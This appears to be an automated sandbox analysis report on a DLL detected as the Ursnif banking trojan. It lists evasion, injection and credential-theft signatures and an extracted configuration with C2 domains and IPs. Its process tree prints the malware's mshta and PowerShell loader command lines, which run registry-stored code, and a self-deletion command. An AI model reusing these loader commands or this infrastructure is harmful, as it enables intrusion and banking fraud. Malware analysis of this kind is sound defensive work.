Edit tour
Windows
Analysis Report
XoVzWJQAQ0.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 6232 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\XoV zWJQAQ0.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 6256 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\XoV zWJQAQ0.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 6352 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\XoVz WJQAQ0.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 6596 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - explorer.exe (PID: 3968 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5972 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\XoVzWJQA Q0.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 1220 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4168 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 1656 cmdline:
cmd /C "ns lookup myi p.opendns. com resolv er1.opendn s.com > C: \Users\use r\AppData\ Local\Temp \1BBD.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- mshta.exe (PID: 4804 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Hli6='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Hli6).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6000 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name elbn svbf -valu e gp; new- alias -nam e dbiansi -value iex ; dbiansi ([System.T ext.Encodi ng]::ASCII .GetString ((elbnsvbf "HKCU:Sof tware\AppD ataLow\Sof tware\Micr osoft\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E").UrlsR eturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6268 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\suyq54b l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 1112 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES99B1.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC A3AF429E64 284F6FBA5C 7EF0C7D44D .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 6536 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\que4qvk g.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 7088 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESB529.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 8B2F5B9E5B 5E42FBBCD6 AAD130D3A7 FD.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
⊘No Sigma rule has matched
Timestamp: | 05/04/22-16:26:18.722944 05/04/22-16:26:18.722944 |
SID: | 2033203 |
Source Port: | 49743 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:26:39.201905 05/04/22-16:26:39.201905 |
SID: | 2033203 |
Source Port: | 49748 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:26:39.682098 05/04/22-16:26:39.682098 |
SID: | 2033203 |
Source Port: | 49748 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:26:38.797354 05/04/22-16:26:38.797354 |
SID: | 2033203 |
Source Port: | 49748 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_00FB5FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_053765C2 | |
Source: | Code function: | 2_2_053799BC | |
Source: | Code function: | 2_2_0538BAD1 |
Source: | Code function: | 2_2_0537FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_00FB1CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary or memory string: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: | Jump to behavior |
Source: | Code function: | 2_2_00FB5FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Code function: | 2_2_00FB829C | |
Source: | Code function: | 2_2_00FB1645 | |
Source: | Code function: | 2_2_00FB4BF1 | |
Source: | Code function: | 2_2_0538154D | |
Source: | Code function: | 2_2_05393DB0 | |
Source: | Code function: | 2_2_0538FF4D | |
Source: | Code function: | 2_2_0538D7F1 | |
Source: | Code function: | 2_2_053767CA | |
Source: | Code function: | 2_2_0537B238 |
Source: | Code function: | 2_2_05388E57 |
Source: | Code function: | 2_2_00FB4321 | |
Source: | Code function: | 2_2_00FB6D0A | |
Source: | Code function: | 2_2_00FB190C | |
Source: | Code function: | 2_2_00FB84C1 | |
Source: | Code function: | 2_2_05386DE0 | |
Source: | Code function: | 2_2_0537C431 | |
Source: | Code function: | 2_2_053774AE | |
Source: | Code function: | 2_2_05380782 | |
Source: | Code function: | 2_2_0538BE80 | |
Source: | Code function: | 2_2_0537710A | |
Source: | Code function: | 2_2_05387950 | |
Source: | Code function: | 2_2_053861AE | |
Source: | Code function: | 2_2_0538A806 | |
Source: | Code function: | 2_2_053800DC | |
Source: | Code function: | 2_2_05382331 | |
Source: | Code function: | 2_2_05385312 | |
Source: | Code function: | 2_2_053764C4 | |
Source: | Code function: | 2_2_0537D77A | |
Source: | Code function: | 2_2_0537B7D5 | |
Source: | Code function: | 2_2_053736BB | |
Source: | Code function: | 2_2_05383829 | |
Source: | Code function: | 2_2_053710C7 | |
Source: | Code function: | 2_2_05385220 | |
Source: | Code function: | 2_2_0538EAC5 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_00FB68BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_00FB7EA9 | |
Source: | Code function: | 2_2_00FB829B | |
Source: | Code function: | 2_2_05393DAF | |
Source: | Code function: | 2_2_05373496 | |
Source: | Code function: | 2_2_053938A9 |
Source: | Static PE information: |
Source: | Code function: | 2_2_0537EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_053765C2 | |
Source: | Code function: | 2_2_053799BC | |
Source: | Code function: | 2_2_0538BAD1 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0537FD47 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 2_2_0537EC00 |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_05378FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_00FB3365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_053881F1 |
Source: | Code function: | 2_2_00FB76BB |
Source: | Code function: | 2_2_00FB6D78 |
Source: | Code function: | 2_2_00FB3365 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
